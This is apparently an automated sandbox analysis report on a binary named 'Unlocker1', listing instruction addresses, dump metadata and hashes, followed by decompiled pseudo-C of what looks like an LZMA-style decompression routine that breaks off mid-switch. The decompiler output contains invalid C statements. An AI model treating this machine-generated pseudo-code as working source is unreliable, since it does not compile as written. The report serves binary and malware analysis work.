                                                                                                                                                              0x00405ff1
                                                                                                                                                              0x00405ff1
                                                                                                                                                              0x00405ff1
                                                                                                                                                              0x00405feb
                                                                                                                                                              0x00405feb
                                                                                                                                                              0x00405feb
                                                                                                                                                              0x00405fe0
                                                                                                                                                              0x00405fe0
                                                                                                                                                              0x00405fe0
                                                                                                                                                              0x00405ff5
                                                                                                                                                              0x00405ff8
                                                                                                                                                              0x00406016
                                                                                                                                                              0x00406016
                                                                                                                                                              0x00406018
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ffa
                                                                                                                                                              0x00405ffa
                                                                                                                                                              0x00405ffa
                                                                                                                                                              0x00405ffd
                                                                                                                                                              0x00406000
                                                                                                                                                              0x00406003
                                                                                                                                                              0x00406005
                                                                                                                                                              0x00406005
                                                                                                                                                              0x00406005
                                                                                                                                                              0x00406008
                                                                                                                                                              0x0040600b
                                                                                                                                                              0x0040600d
                                                                                                                                                              0x0040600e
                                                                                                                                                              0x00406011
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406011
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406247
                                                                                                                                                              0x00406247
                                                                                                                                                              0x0040624b
                                                                                                                                                              0x00406269
                                                                                                                                                              0x00406269
                                                                                                                                                              0x0040626c
                                                                                                                                                              0x00406273
                                                                                                                                                              0x00406276
                                                                                                                                                              0x00406279
                                                                                                                                                              0x0040627c
                                                                                                                                                              0x0040627f
                                                                                                                                                              0x00406139
                                                                                                                                                              0x0040613c
                                                                                                                                                              0x0040613f
                                                                                                                                                              0x00406142
                                                                                                                                                              0x00406145
                                                                                                                                                              0x0040615d
                                                                                                                                                              0x00406160
                                                                                                                                                              0x00406163
                                                                                                                                                              0x00406166
                                                                                                                                                              0x00406166
                                                                                                                                                              0x00406169
                                                                                                                                                              0x0040616d
                                                                                                                                                              0x0040616f
                                                                                                                                                              0x00406147
                                                                                                                                                              0x00406147
                                                                                                                                                              0x0040614f
                                                                                                                                                              0x00406154
                                                                                                                                                              0x00406156
                                                                                                                                                              0x00406158
                                                                                                                                                              0x00406158
                                                                                                                                                              0x00406172
                                                                                                                                                              0x00406179
                                                                                                                                                              0x0040617c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040617e
                                                                                                                                                              0x0040617e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040617e
                                                                                                                                                              0x0040617c
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004061be
                                                                                                                                                              0x004061be
                                                                                                                                                              0x004061c2
                                                                                                                                                              0x004067ca
                                                                                                                                                              0x004067ca
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067ca
                                                                                                                                                              0x004061c8
                                                                                                                                                              0x004061c8
                                                                                                                                                              0x004061cb
                                                                                                                                                              0x004061ce
                                                                                                                                                              0x004061d2
                                                                                                                                                              0x004061d5
                                                                                                                                                              0x004061db
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061e0
                                                                                                                                                              0x004061e3
                                                                                                                                                              0x004061e3
                                                                                                                                                              0x004061e9
                                                                                                                                                              0x00406187
                                                                                                                                                              0x00406187
                                                                                                                                                              0x0040618a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040618a
                                                                                                                                                              0x004061eb
                                                                                                                                                              0x004061eb
                                                                                                                                                              0x004061ee
                                                                                                                                                              0x004061f1
                                                                                                                                                              0x004061f4
                                                                                                                                                              0x004061f7
                                                                                                                                                              0x004061fa
                                                                                                                                                              0x004061fd
                                                                                                                                                              0x00406200
                                                                                                                                                              0x00406203
                                                                                                                                                              0x00406206
                                                                                                                                                              0x00406209
                                                                                                                                                              0x00406221
                                                                                                                                                              0x00406224
                                                                                                                                                              0x00406227
                                                                                                                                                              0x0040622a
                                                                                                                                                              0x0040622a
                                                                                                                                                              0x0040622d
                                                                                                                                                              0x00406231
                                                                                                                                                              0x00406233
                                                                                                                                                              0x0040620b
                                                                                                                                                              0x0040620b
                                                                                                                                                              0x00406213
                                                                                                                                                              0x00406218
                                                                                                                                                              0x0040621a
                                                                                                                                                              0x0040621c
                                                                                                                                                              0x0040621c
                                                                                                                                                              0x00406236
                                                                                                                                                              0x0040623d
                                                                                                                                                              0x00406240
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406242
                                                                                                                                                              0x00406242
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406242
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064cf
                                                                                                                                                              0x004064cf
                                                                                                                                                              0x004064d3
                                                                                                                                                              0x004067fa
                                                                                                                                                              0x004067fa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067fa
                                                                                                                                                              0x004064d9
                                                                                                                                                              0x004064d9
                                                                                                                                                              0x004064dc
                                                                                                                                                              0x004064df
                                                                                                                                                              0x004064e3
                                                                                                                                                              0x004064e6
                                                                                                                                                              0x004064ec
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064f1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040629f
                                                                                                                                                              0x0040629f
                                                                                                                                                              0x004062a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065de
                                                                                                                                                              0x004065de
                                                                                                                                                              0x004065e2
                                                                                                                                                              0x00406604
                                                                                                                                                              0x00406604
                                                                                                                                                              0x00406607
                                                                                                                                                              0x00406611
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406614
                                                                                                                                                              0x004065e4
                                                                                                                                                              0x004065e4
                                                                                                                                                              0x004065e7
                                                                                                                                                              0x004065eb
                                                                                                                                                              0x004065ee
                                                                                                                                                              0x004065ee
                                                                                                                                                              0x004065f1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040669b
                                                                                                                                                              0x0040669b
                                                                                                                                                              0x0040669f
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066c4
                                                                                                                                                              0x004066cb
                                                                                                                                                              0x004066d2
                                                                                                                                                              0x004066d2
                                                                                                                                                              0x004066d9
                                                                                                                                                              0x004066dc
                                                                                                                                                              0x004066e3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004066e6
                                                                                                                                                              0x004066a1
                                                                                                                                                              0x004066a1
                                                                                                                                                              0x004066a4
                                                                                                                                                              0x004066a7
                                                                                                                                                              0x004066aa
                                                                                                                                                              0x004066b1
                                                                                                                                                              0x004065f5
                                                                                                                                                              0x004065f5
                                                                                                                                                              0x00406322
                                                                                                                                                              0x00406322
                                                                                                                                                              0x00406325
                                                                                                                                                              0x00406328
                                                                                                                                                              0x0040632b
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x00406330
                                                                                                                                                              0x00406333
                                                                                                                                                              0x00406336
                                                                                                                                                              0x00406339
                                                                                                                                                              0x0040633c
                                                                                                                                                              0x0040633f
                                                                                                                                                              0x00406340
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406345
                                                                                                                                                              0x00406348
                                                                                                                                                              0x0040634b
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x00406351
                                                                                                                                                              0x00406353
                                                                                                                                                              0x00406353
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406599
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040659f
                                                                                                                                                              0x0040659f
                                                                                                                                                              0x004065a2
                                                                                                                                                              0x004065a5
                                                                                                                                                              0x004065a8
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065ad
                                                                                                                                                              0x004065b0
                                                                                                                                                              0x004065b3
                                                                                                                                                              0x004065b6
                                                                                                                                                              0x004065b9
                                                                                                                                                              0x004065bc
                                                                                                                                                              0x004065bd
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065c2
                                                                                                                                                              0x004065c5
                                                                                                                                                              0x004065c8
                                                                                                                                                              0x004065cb
                                                                                                                                                              0x004065ce
                                                                                                                                                              0x004065d2
                                                                                                                                                              0x004065d4
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065d9
                                                                                                                                                              0x004065d9
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406356
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x0040680c
                                                                                                                                                              0x0040680c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e3b
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00406710
                                                                                                                                                              0x004066d9

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 8ad8b3a7fce677aa33c13c02e3180aa90519ee056083dbfcd0f6a1ae91265e6c
                                                                                                                                                              • Instruction ID: 95af8839098f806f541805b71f16133a603fad5641f47eebb8f014e75b9041d1
                                                                                                                                                              • Opcode Fuzzy Hash: 8ad8b3a7fce677aa33c13c02e3180aa90519ee056083dbfcd0f6a1ae91265e6c
                                                                                                                                                              • Instruction Fuzzy Hash: 58A13371D00229CBDF28CFA8C8447ADBBB1FF44305F25856AD856BB281D7789A86DF44
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                              			E004065DE() {
                                                                                                                                                              				void _t533;
                                                                                                                                                              				signed int _t534;
                                                                                                                                                              				signed int _t535;
                                                                                                                                                              				signed int* _t605;
                                                                                                                                                              				void* _t612;
                                                                                                                                                              
                                                                                                                                                              				L0:
                                                                                                                                                              				while(1) {
                                                                                                                                                              					L0:
                                                                                                                                                              					if( *(_t612 - 0x40) != 0) {
                                                                                                                                                              						 *(_t612 - 0x84) = 0x13;
                                                                                                                                                              						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                                                                                                                              						goto L132;
                                                                                                                                                              					} else {
                                                                                                                                                              						__eax =  *(__ebp - 0x4c);
                                                                                                                                                              						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                              						__ecx =  *(__ebp - 0x58);
                                                                                                                                                              						__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                              						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                              						L130:
                                                                                                                                                              						 *(__ebp - 0x58) = __eax;
                                                                                                                                                              						 *(__ebp - 0x40) = 3;
                                                                                                                                                              						L144:
                                                                                                                                                              						 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                              						L145:
                                                                                                                                                              						__eax =  *(__ebp - 0x40);
                                                                                                                                                              						 *(__ebp - 0x50) = 1;
                                                                                                                                                              						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                              						L149:
                                                                                                                                                              						if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                              							__ecx =  *(__ebp - 0x40);
                                                                                                                                                              							__ebx =  *(__ebp - 0x50);
                                                                                                                                                              							0 = 1;
                                                                                                                                                              							__eax = 1 << __cl;
                                                                                                                                                              							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                              							__eax =  *(__ebp - 0x7c);
                                                                                                                                                              							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              							while(1) {
                                                                                                                                                              								L140:
                                                                                                                                                              								 *(_t612 - 0x88) = _t533;
                                                                                                                                                              								while(1) {
                                                                                                                                                              									L1:
                                                                                                                                                              									_t534 =  *(_t612 - 0x88);
                                                                                                                                                              									if(_t534 > 0x1c) {
                                                                                                                                                              										break;
                                                                                                                                                              									}
                                                                                                                                                              									switch( *((intOrPtr*)(_t534 * 4 +  &M0040684B))) {
                                                                                                                                                              										case 0:
                                                                                                                                                              											if( *(_t612 - 0x6c) == 0) {
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                                                              											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                                                              											_t534 =  *( *(_t612 - 0x70));
                                                                                                                                                              											if(_t534 > 0xe1) {
                                                                                                                                                              												goto L171;
                                                                                                                                                              											}
                                                                                                                                                              											_t538 = _t534 & 0x000000ff;
                                                                                                                                                              											_push(0x2d);
                                                                                                                                                              											asm("cdq");
                                                                                                                                                              											_pop(_t569);
                                                                                                                                                              											_push(9);
                                                                                                                                                              											_pop(_t570);
                                                                                                                                                              											_t608 = _t538 / _t569;
                                                                                                                                                              											_t540 = _t538 % _t569 & 0x000000ff;
                                                                                                                                                              											asm("cdq");
                                                                                                                                                              											_t603 = _t540 % _t570 & 0x000000ff;
                                                                                                                                                              											 *(_t612 - 0x3c) = _t603;
                                                                                                                                                              											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                                                                                                                              											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                                                                                                                              											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                                                                                                                              											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                                                                                                                              												L10:
                                                                                                                                                              												if(_t611 == 0) {
                                                                                                                                                              													L12:
                                                                                                                                                              													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                                                                                                                              													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                                                                                              													goto L15;
                                                                                                                                                              												} else {
                                                                                                                                                              													goto L11;
                                                                                                                                                              												}
                                                                                                                                                              												do {
                                                                                                                                                              													L11:
                                                                                                                                                              													_t611 = _t611 - 1;
                                                                                                                                                              													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                                                                                                                              												} while (_t611 != 0);
                                                                                                                                                              												goto L12;
                                                                                                                                                              											}
                                                                                                                                                              											if( *(_t612 - 4) != 0) {
                                                                                                                                                              												GlobalFree( *(_t612 - 4)); // executed
                                                                                                                                                              											}
                                                                                                                                                              											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                              											 *(_t612 - 4) = _t534;
                                                                                                                                                              											if(_t534 == 0) {
                                                                                                                                                              												goto L171;
                                                                                                                                                              											} else {
                                                                                                                                                              												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                                                                                                                              												goto L10;
                                                                                                                                                              											}
                                                                                                                                                              										case 1:
                                                                                                                                                              											L13:
                                                                                                                                                              											__eflags =  *(_t612 - 0x6c);
                                                                                                                                                              											if( *(_t612 - 0x6c) == 0) {
                                                                                                                                                              												 *(_t612 - 0x88) = 1;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                                                              											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                                                                                                                              											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                                                              											_t45 = _t612 - 0x48;
                                                                                                                                                              											 *_t45 =  *(_t612 - 0x48) + 1;
                                                                                                                                                              											__eflags =  *_t45;
                                                                                                                                                              											L15:
                                                                                                                                                              											if( *(_t612 - 0x48) < 4) {
                                                                                                                                                              												goto L13;
                                                                                                                                                              											}
                                                                                                                                                              											_t546 =  *(_t612 - 0x40);
                                                                                                                                                              											if(_t546 ==  *(_t612 - 0x74)) {
                                                                                                                                                              												L20:
                                                                                                                                                              												 *(_t612 - 0x48) = 5;
                                                                                                                                                              												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                                                                                                                              												goto L23;
                                                                                                                                                              											}
                                                                                                                                                              											 *(_t612 - 0x74) = _t546;
                                                                                                                                                              											if( *(_t612 - 8) != 0) {
                                                                                                                                                              												GlobalFree( *(_t612 - 8)); // executed
                                                                                                                                                              											}
                                                                                                                                                              											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                                                                                                                              											 *(_t612 - 8) = _t534;
                                                                                                                                                              											if(_t534 == 0) {
                                                                                                                                                              												goto L171;
                                                                                                                                                              											} else {
                                                                                                                                                              												goto L20;
                                                                                                                                                              											}
                                                                                                                                                              										case 2:
                                                                                                                                                              											L24:
                                                                                                                                                              											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                                                                                                                              											 *(_t612 - 0x84) = 6;
                                                                                                                                                              											 *(_t612 - 0x4c) = _t553;
                                                                                                                                                              											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                                                                                                                              											goto L132;
                                                                                                                                                              										case 3:
                                                                                                                                                              											L21:
                                                                                                                                                              											__eflags =  *(_t612 - 0x6c);
                                                                                                                                                              											if( *(_t612 - 0x6c) == 0) {
                                                                                                                                                              												 *(_t612 - 0x88) = 3;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                                                              											_t67 = _t612 - 0x70;
                                                                                                                                                              											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                                                                                                                              											__eflags =  *_t67;
                                                                                                                                                              											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                                                                                              											L23:
                                                                                                                                                              											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                                                                                                                              											if( *(_t612 - 0x48) != 0) {
                                                                                                                                                              												goto L21;
                                                                                                                                                              											}
                                                                                                                                                              											goto L24;
                                                                                                                                                              										case 4:
                                                                                                                                                              											L133:
                                                                                                                                                              											_t531 =  *_t605;
                                                                                                                                                              											_t588 = _t531 & 0x0000ffff;
                                                                                                                                                              											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                                                                                                                              											if( *(_t612 - 0xc) >= _t564) {
                                                                                                                                                              												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                                                                                                                              												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                                                                                                                              												 *(_t612 - 0x40) = 1;
                                                                                                                                                              												_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                              												__eflags = _t532;
                                                                                                                                                              												 *_t605 = _t532;
                                                                                                                                                              											} else {
                                                                                                                                                              												 *(_t612 - 0x10) = _t564;
                                                                                                                                                              												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                                                                                              												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                                                                                                                              											}
                                                                                                                                                              											if( *(_t612 - 0x10) >= 0x1000000) {
                                                                                                                                                              												goto L139;
                                                                                                                                                              											} else {
                                                                                                                                                              												goto L137;
                                                                                                                                                              											}
                                                                                                                                                              										case 5:
                                                                                                                                                              											L137:
                                                                                                                                                              											if( *(_t612 - 0x6c) == 0) {
                                                                                                                                                              												 *(_t612 - 0x88) = 5;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                                                                                                                              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                                                              											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                                                              											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                                                                                              											L139:
                                                                                                                                                              											_t533 =  *(_t612 - 0x84);
                                                                                                                                                              											goto L140;
                                                                                                                                                              										case 6:
                                                                                                                                                              											__edx = 0;
                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                                                                                              												 *(__ebp - 0x34) = 1;
                                                                                                                                                              												 *(__ebp - 0x84) = 7;
                                                                                                                                                              												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              												goto L132;
                                                                                                                                                              											}
                                                                                                                                                              											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                              											__esi =  *(__ebp - 0x60);
                                                                                                                                                              											__cl = 8;
                                                                                                                                                              											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                              											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                              											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                              											__ecx =  *(__ebp - 0x3c);
                                                                                                                                                              											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                              											__ecx =  *(__ebp - 4);
                                                                                                                                                              											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                              											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                              											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                              											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                              											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                              											if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                              												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                              													_t98 = __ebp - 0x38;
                                                                                                                                                              													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                              													__eflags =  *_t98;
                                                                                                                                                              												} else {
                                                                                                                                                              													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                              												}
                                                                                                                                                              											} else {
                                                                                                                                                              												 *(__ebp - 0x38) = 0;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                              											if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                              												__ebx = 0;
                                                                                                                                                              												__ebx = 1;
                                                                                                                                                              												goto L61;
                                                                                                                                                              											} else {
                                                                                                                                                              												__eax =  *(__ebp - 0x14);
                                                                                                                                                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                              												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                              												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                              													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 8);
                                                                                                                                                              												__ebx = 0;
                                                                                                                                                              												__ebx = 1;
                                                                                                                                                              												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                              												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                              												goto L41;
                                                                                                                                                              											}
                                                                                                                                                              										case 7:
                                                                                                                                                              											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                              											if( *(__ebp - 0x40) != 1) {
                                                                                                                                                              												__eax =  *(__ebp - 0x24);
                                                                                                                                                              												 *(__ebp - 0x80) = 0x16;
                                                                                                                                                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                              												__eax =  *(__ebp - 0x28);
                                                                                                                                                              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                              												__eax =  *(__ebp - 0x2c);
                                                                                                                                                              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                              												__eax = 0;
                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                              												__al = __al & 0x000000fd;
                                                                                                                                                              												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                              												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              												 *(__ebp - 0x58) = __eax;
                                                                                                                                                              												goto L69;
                                                                                                                                                              											}
                                                                                                                                                              											__eax =  *(__ebp - 4);
                                                                                                                                                              											__ecx =  *(__ebp - 0x38);
                                                                                                                                                              											 *(__ebp - 0x84) = 8;
                                                                                                                                                              											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              											goto L132;
                                                                                                                                                              										case 8:
                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                                                                                              												 *(__ebp - 0x84) = 0xa;
                                                                                                                                                              												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              											} else {
                                                                                                                                                              												__eax =  *(__ebp - 0x38);
                                                                                                                                                              												__ecx =  *(__ebp - 4);
                                                                                                                                                              												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                              												 *(__ebp - 0x84) = 9;
                                                                                                                                                              												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                              												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                              											}
                                                                                                                                                              											goto L132;
                                                                                                                                                              										case 9:
                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              												goto L90;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *(__ebp - 0x60);
                                                                                                                                                              											if( *(__ebp - 0x60) == 0) {
                                                                                                                                                              												goto L171;
                                                                                                                                                              											}
                                                                                                                                                              											__eax = 0;
                                                                                                                                                              											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                              											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                              											__eflags = _t259;
                                                                                                                                                              											0 | _t259 = _t259 + _t259 + 9;
                                                                                                                                                              											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                                                              											goto L76;
                                                                                                                                                              										case 0xa:
                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
